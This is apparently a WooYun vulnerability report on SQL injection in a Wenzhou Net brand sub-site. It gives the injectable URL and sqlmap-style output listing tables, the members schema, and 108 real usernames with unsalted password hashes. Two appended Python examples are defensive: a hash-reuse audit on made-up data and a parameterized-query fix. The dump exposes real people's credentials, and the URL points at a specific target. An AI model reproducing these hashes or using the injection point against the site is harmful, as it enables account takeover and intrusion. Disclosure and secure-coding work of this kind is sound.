
Vulnerability summary (24 followers)

Defect ID: wooyun-2013-046524

Title: SQL injection vulnerability in a 温州网 (Wenzhou Net) sub-site

Vendor: 温州网

Author: Focusstart

Submitted: 2013-12-20 12:39

Fix time: 2014-02-03 12:39

Disclosed: 2014-02-03 12:39

Type: SQL injection

Severity: High

Self-assessed rank: 10

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2013-12-20: actively contacting the vendor and waiting for the vendor to claim the report; details not public
2014-02-03: the vendor has chosen to ignore the vulnerability; details disclosed to the public

Brief description:

Details:

Injection point: http://brand.66wz.com/store.php?id=18
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
Database: brand
[54 tables]
+-----------------------+
| brand_admincp_group |
| brand_admincp_member |
| brand_admincp_perm |
| brand_adminsession |
| brand_advertisement |
| brand_albumitems |
| brand_attachments |
| brand_attribute |
| brand_attrvalue |
| brand_attrvalue_text |
| brand_blocks |
| brand_brandlinks |
| brand_cache |
| brand_cachenotes |
| brand_categories |
| brand_commentmodels |
| brand_commentscores |
| brand_consumeitems |
| brand_consumemessage |
| brand_correctioninfos |
| brand_crons |
| brand_data |
| brand_gooditems |
| brand_goodjoin |
| brand_goodmessage |
| brand_goodrelated |
| brand_groupbuyitems |
| brand_groupbuyjoin |
| brand_groupbuymessage |
| brand_itemattribute |
| brand_itemupdates |
| brand_members |
| brand_modelcolumns |
| brand_models |
| brand_nav |
| brand_noticeitems |
| brand_noticemessage |
| brand_photoitems |
| brand_relatedinfo |
| brand_reportlog |
| brand_reportreasons |
| brand_scorestats |
| brand_settings |
| brand_shopgroup |
| brand_shopitems |
| brand_shopmapmarks |
| brand_shopmessage |
| brand_shoptag |
| brand_shopupdate |
| brand_spacecomments |
| brand_stat |
| brand_statuser |
| brand_verify |
| brand_xml_client |
+-----------------------+
Table: brand_members
[14 columns]
+-----------------+-----------------------+
| Column | Type |
+-----------------+-----------------------+
| allowadmincp | tinyint(1) unsigned |
| dateline | int(10) unsigned |
| email | char(100) |
| groupid | smallint(6) unsigned |
| ip | char(15) |
| lastcommenttime | int(10) unsigned |
| lastlogin | int(10) unsigned |
| lastsearchtime | int(10) unsigned |
| myshopid | mediumint(8) unsigned |
| password | char(32) |
| taskstatus | tinyint(1) unsigned |
| uid | mediumint(8) unsigned |
| updatetime | int(10) unsigned |
| username | char(15) |
+-----------------+-----------------------+
Table: brand_members
[108 entries]
+--------------+----------------------------------+
| username | password |
+--------------+----------------------------------+
| Aleksan | 67220fb120af135fbd2f88fe7941489a |
| smh | ac77ae8bdfd45b47524e1ceca60c760b |
| aleksan2 | ddea9b4560ca7f3bae9e8351c53cdfd5 |
| dananhai86 | 1bfa71d39c1a6afc0132cf48ade0366e |
| magicyang | 5929aefcc82c9705bfe173822e1defed |
| USAAAA | 3b6844f1ca2af478e6b500197389e595 |
| 温网论坛 | 2152b36bd340d9251b8342d7b57c48d3 |
| 黄作敏 | f378cd3bcfe5784097ed2b0a23594f28 |
| ssadwlll | 06ea0dbe91bb44217cfcf838055195e0 |
| hacksee66 | 598fc77a7e22ef0bf3bc70ec4d632487 |
| hack2010 | 36ee8d6b86eef856494920dd459e966d |
| gjgj | e10adc3949ba59abbe56e057f20f883e |
| 用户名11 | e10adc3949ba59abbe56e057f20f883e |
| AAAA请求权 | e10adc3949ba59abbe56e057f20f883e |
| tuobao | 1473f08e23d9f10b94f7d5117bdd4345 |
| 闯入百年 | 93bbcfa7b587f2fa49a2b061ca496039 |
| 品牌空间 | e10adc3949ba59abbe56e057f20f883e |
| wzlx580 | d4a3c79dc9f90bb897c97f4e7b850d12 |
| 温州吉达 | 770cff32667741ce96de805a88b95135 |
| 黑夜舞者 | bd53532a815c9b53cba6f3d6ea888ec2 |
| wzrcb580 | 68f35f9ef530f0bd4779b1db43b79168 |
| 数码\xb7海信 | e10adc3949ba59abbe56e057f20f883e |
| hacksee | 558921df0bd51c6320cb59c2104c7924 |
| bbcbs | 2532aa5704b6647b2498ccdbc0567c43 |
| 雪拉同映画视觉 | 245483aa0f5ae2f0055766c26755b13c |
| 方大同音乐之旅 | 3dd8026031e6b0b1520856e8b5ffcc91 |
| 天下浪才 | e73c85092b9aa10b2fbd7fb561bb5da2 |
| 调色板 | b67a4c76e6805de689007fd52a10d643 |
| 伤感的心 | ed3eaccad852de7237f8058084a15d50 |
| 沧海航舟 | 12638ab37dac91598ad5cbab9b05312f |
| 邪恶首领 | 7f7919de9c456044bcb4f9e692f1e6f1 |
| ziyao | 9f920b78998d8547460d09a693cb2a06 |
| 郁金芬芳香 | 13bc574a322877d4d81626651bd0a41c |
| 浪迹天涯 | 9d9e36695fa945974d7f142fb38e0922 |
| tiger_tianle | c259abc134cc9a6b21b85b92a5ced340 |
| 钦舞飞扬 | 8d5b4d76e09f9cafe1de57408cf312d4 |
| 韩韶轩 | cea0f3b814df3de0144dc209aa5a08f7 |
| duanchongzi | a113fcf549c9fd6a20b02bb0566efcb4 |
| chenchunlan7 | 25f91d8119ec465c9b02b804ecb5ae60 |
| xdkfysqq | 1f1767b5696e79116b11ecc7f2882783 |
| qfsxbxao | 1f1767b5696e79116b11ecc7f2882783 |
| doyyqipc | 1f1767b5696e79116b11ecc7f2882783 |
| lhfuuwlr | 1f1767b5696e79116b11ecc7f2882783 |
| fgyfdomp | 1f1767b5696e79116b11ecc7f2882783 |
| slyxlnwl | 1f1767b5696e79116b11ecc7f2882783 |
| wmhjnhyn | 1f1767b5696e79116b11ecc7f2882783 |
| fgflosgk | 1f1767b5696e79116b11ecc7f2882783 |
| cvafdded | 1f1767b5696e79116b11ecc7f2882783 |
| acshjhuc | 1f1767b5696e79116b11ecc7f2882783 |
| nntauidi | 1f1767b5696e79116b11ecc7f2882783 |
| jjjndugr | 1f1767b5696e79116b11ecc7f2882783 |
| rokvauhe | 1f1767b5696e79116b11ecc7f2882783 |
| sdwgfcny | 32cc5886dc1fa8c106a02056292c4654 |
| pdiaesxl | 32cc5886dc1fa8c106a02056292c4654 |
| exicbdrq | 32cc5886dc1fa8c106a02056292c4654 |
| onfyojtv | 32cc5886dc1fa8c106a02056292c4654 |
| gftsjjey | 32cc5886dc1fa8c106a02056292c4654 |
| stjjyqqh | 32cc5886dc1fa8c106a02056292c4654 |
| absiapuu | 32cc5886dc1fa8c106a02056292c4654 |
| kvqripwb | 32cc5886dc1fa8c106a02056292c4654 |
| letgjxkr | 32cc5886dc1fa8c106a02056292c4654 |
| fhcpldqx | 32cc5886dc1fa8c106a02056292c4654 |
| wircsctk | 32cc5886dc1fa8c106a02056292c4654 |
| otlvfmif | 32cc5886dc1fa8c106a02056292c4654 |
| wedelpau | 32cc5886dc1fa8c106a02056292c4654 |
| ijggwhel | 32cc5886dc1fa8c106a02056292c4654 |
| lbxgvftq | 32cc5886dc1fa8c106a02056292c4654 |
| bovifkgp | 32cc5886dc1fa8c106a02056292c4654 |
| eqrswjsy | 32cc5886dc1fa8c106a02056292c4654 |
| ttrlhtex | 32cc5886dc1fa8c106a02056292c4654 |
| pcggkams | 32cc5886dc1fa8c106a02056292c4654 |
| sxwqvofh | 32cc5886dc1fa8c106a02056292c4654 |
| rhrkffng | 32cc5886dc1fa8c106a02056292c4654 |
| skkgnaes | 32cc5886dc1fa8c106a02056292c4654 |
| cdqikivf | 32cc5886dc1fa8c106a02056292c4654 |
| emfhtpxp | 32cc5886dc1fa8c106a02056292c4654 |
| pivhylbp | 32cc5886dc1fa8c106a02056292c4654 |
| xvahovng | 32cc5886dc1fa8c106a02056292c4654 |
| 阿嫒 | a9707e805d8aadbd28824b071a077bf2 |
| xdhowvua | 32cc5886dc1fa8c106a02056292c4654 |
| vjgbwivq | 32cc5886dc1fa8c106a02056292c4654 |
| ctysnfea | 32cc5886dc1fa8c106a02056292c4654 |
| kfrvabqg | 32cc5886dc1fa8c106a02056292c4654 |
| kbxmrofm | 32cc5886dc1fa8c106a02056292c4654 |
| mmhhndxh | 32cc5886dc1fa8c106a02056292c4654 |
| iaxeoccq | 32cc5886dc1fa8c106a02056292c4654 |
| cfeykfhc | 32cc5886dc1fa8c106a02056292c4654 |
| mujuasvd | 32cc5886dc1fa8c106a02056292c4654 |
| qraotrmp | 32cc5886dc1fa8c106a02056292c4654 |
| gjumwgfv | 32cc5886dc1fa8c106a02056292c4654 |
| jurjxsvt | 32cc5886dc1fa8c106a02056292c4654 |
| colgsmij | 32cc5886dc1fa8c106a02056292c4654 |
| clebraum | 32cc5886dc1fa8c106a02056292c4654 |
| aaaaaaabc | 5a2e936fbf1908d95973918efc4b6780 |
| tbtmueju | 32cc5886dc1fa8c106a02056292c4654 |
| dpmadlmb | 32cc5886dc1fa8c106a02056292c4654 |
| jnecwami | 32cc5886dc1fa8c106a02056292c4654 |
| qmmylwqj | 32cc5886dc1fa8c106a02056292c4654 |
| xknaqwol | 32cc5886dc1fa8c106a02056292c4654 |
| hyaouvgq | 32cc5886dc1fa8c106a02056292c4654 |
| jyvovxcj | 32cc5886dc1fa8c106a02056292c4654 |
| knvtvcrt | 32cc5886dc1fa8c106a02056292c4654 |
| rggrcili | 32cc5886dc1fa8c106a02056292c4654 |
| jsyblgel | 32cc5886dc1fa8c106a02056292c4654 |
| hflefnbn | 32cc5886dc1fa8c106a02056292c4654 |
| xlbakayx | 32cc5886dc1fa8c106a02056292c4654 |
| ohcnegca | 32cc5886dc1fa8c106a02056292c4654 |
| test888 | 96e79218965eb72c92a549dd5a330112 |
+--------------+----------------------------------+
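Two things stand out in the dumped brand_members table: the password column is char(32) and holds bare 32-character hex digests (no salt, no algorithm tag), and dozens of accounts share a single digest, which means those users chose the same password or were bulk-registered with one. The script below is an added example, not part of the original report or of the site's code. It parses a constructed table in the same pipe layout as the sqlmap output above, counts digests that look like unsalted MD5-length hashes, groups accounts that share a hash, and contrasts that storage format with a salted PBKDF2 hash whose output deliberately cannot fit a char(32) column. Every username and digest in the sample is constructed; the function names are the example's own.

```python
import hashlib
import hmac
import os
import re
from collections import defaultdict

# Constructed sample in the same pipe-table layout as the sqlmap dump above.
# Every username and digest here is made up for this example; none are rows from the report.
SAMPLE_DUMP = """\
Table: members
[6 entries]
+--------------+----------------------------------+
| username     | password                         |
+--------------+----------------------------------+
| alice        | 0f1e2d3c4b5a69788796a5b4c3d2e1f0 |
| bob          | 0f1e2d3c4b5a69788796a5b4c3d2e1f0 |
| qzxwvutsra   | ffeeddccbbaa99887766554433221100 |
| mnbvcxzlkj   | ffeeddccbbaa99887766554433221100 |
| poiuytrewq   | ffeeddccbbaa99887766554433221100 |
| dave         | not-a-hex-digest-at-all          |
+--------------+----------------------------------+
"""

HEX32 = re.compile(r"[0-9a-f]{32}")        # a 128-bit digest rendered as hex (MD5-sized, no salt)
RANDOM_NAME = re.compile(r"[a-z]{8,12}")   # heuristic: bulk-registered accounts often look like this


def parse_dump(text):
    """Return (username, password) pairs from a sqlmap-style pipe table."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 2 or cells[0] == "username":
            continue  # separator or header row
        rows.append((cells[0], cells[1]))
    return rows


def audit(rows):
    """Summarise the storage weaknesses visible in a credential dump."""
    by_hash = defaultdict(list)
    unsalted = 0
    for user, pw in rows:
        if HEX32.fullmatch(pw):
            unsalted += 1  # fixed-width hex with no salt or parameters embedded
        by_hash[pw].append(user)
    # Identical digests mean identical passwords when there is no per-user salt.
    reused = {h: users for h, users in by_hash.items() if len(users) > 1}
    # Three or more random-looking names on one digest suggests scripted registration.
    bulk = {h: users for h, users in reused.items()
            if len(users) >= 3 and all(RANDOM_NAME.fullmatch(u) for u in users)}
    return {
        "total": len(rows),
        "unsalted_md5_length": unsalted,
        "reused_hashes": reused,
        "bulk_account_groups": bulk,
    }


PBKDF2_ROUNDS = 200_000


def hash_password(password, salt=None):
    """Salted, iterated hash. The encoded result is far longer than 32 characters,
    so migrating to it also means widening the password column."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and rounds; compare in constant time."""
    algo, rounds, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    report = audit(parse_dump(SAMPLE_DUMP))
    print(f"{report['unsalted_md5_length']}/{report['total']} passwords stored as bare 32-hex digests")
    for h, users in report["reused_hashes"].items():
        print(f"digest {h[:8]}... shared by {len(users)} accounts: {', '.join(users)}")
    print("bulk-registered groups:", len(report["bulk_account_groups"]))
```

Run against the real dump, the same logic would show the two large clusters of eight-letter usernames sharing one digest each, which is the signature of scripted sign-ups rather than of 70 people independently choosing a password. The 32-hex check is a heuristic: it cannot tell MD5 from another 128-bit digest, but it does prove the absence of a per-user salt, which is the property that makes shared passwords visible in the first place.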

Proof of vulnerability:

Injection point: http://brand.66wz.com/store.php?id=18 (same sqlmap output as under Details above)

Fix:

You know.

Copyright notice: when reposting, credit the source: Focusstart@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused.
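The fix the author leaves unstated is the standard one for a store.php?id= style lookup: treat the id as an integer (reject anything else before a query is built) and bind it as a query parameter so the database never parses it as SQL. The Python below is an added example and not the site's code. It uses an in-memory SQLite table as a constructed stand-in for the MySQL backend named in the report, and the table name store and the functions build_db, vulnerable_sql, lookup_store_vulnerable, parse_store_id and lookup_store_safe are the example's own names.

```python
import re
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the site's database (not its real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE store (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO store VALUES (?, ?)",
                   [(17, "Shop Seventeen"), (18, "Shop Eighteen")])
    return db


def vulnerable_sql(raw_id):
    """The defect class behind store.php?id=: the request value is spliced into the
    statement text, so whatever the client sends reaches the SQL parser verbatim."""
    return "SELECT id, name FROM store WHERE id = " + raw_id


def lookup_store_vulnerable(db, raw_id):
    return db.execute(vulnerable_sql(raw_id)).fetchall()


ID_RE = re.compile(r"[0-9]{1,9}")


def parse_store_id(raw_id):
    """Allow-list check: a short decimal integer or nothing. Anything else is rejected
    before a query exists, which is the first line of defence."""
    if raw_id is None or not ID_RE.fullmatch(raw_id):
        return None
    return int(raw_id)


def lookup_store_safe(db, raw_id):
    """Second line of defence: the validated value is bound as a parameter, so the
    database only ever sees it as data to compare against, never as SQL text."""
    store_id = parse_store_id(raw_id)
    if store_id is None:
        return []
    return db.execute("SELECT id, name FROM store WHERE id = ?", (store_id,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(lookup_store_safe(db, "18"))      # [(18, 'Shop Eighteen')]
    print(lookup_store_safe(db, "18 x"))    # [] (rejected by the allow-list, no query issued)
    print(vulnerable_sql("18 x"))           # the raw string is now part of the statement
```

Both layers matter: the allow-list keeps malformed input out of the application entirely, and the bound parameter protects the query even if a later code path forgets the check. On the PHP 5.2 / MySQL stack named in the report the same shape is achieved with an integer cast plus a prepared statement (mysqli or PDO) rather than string concatenation.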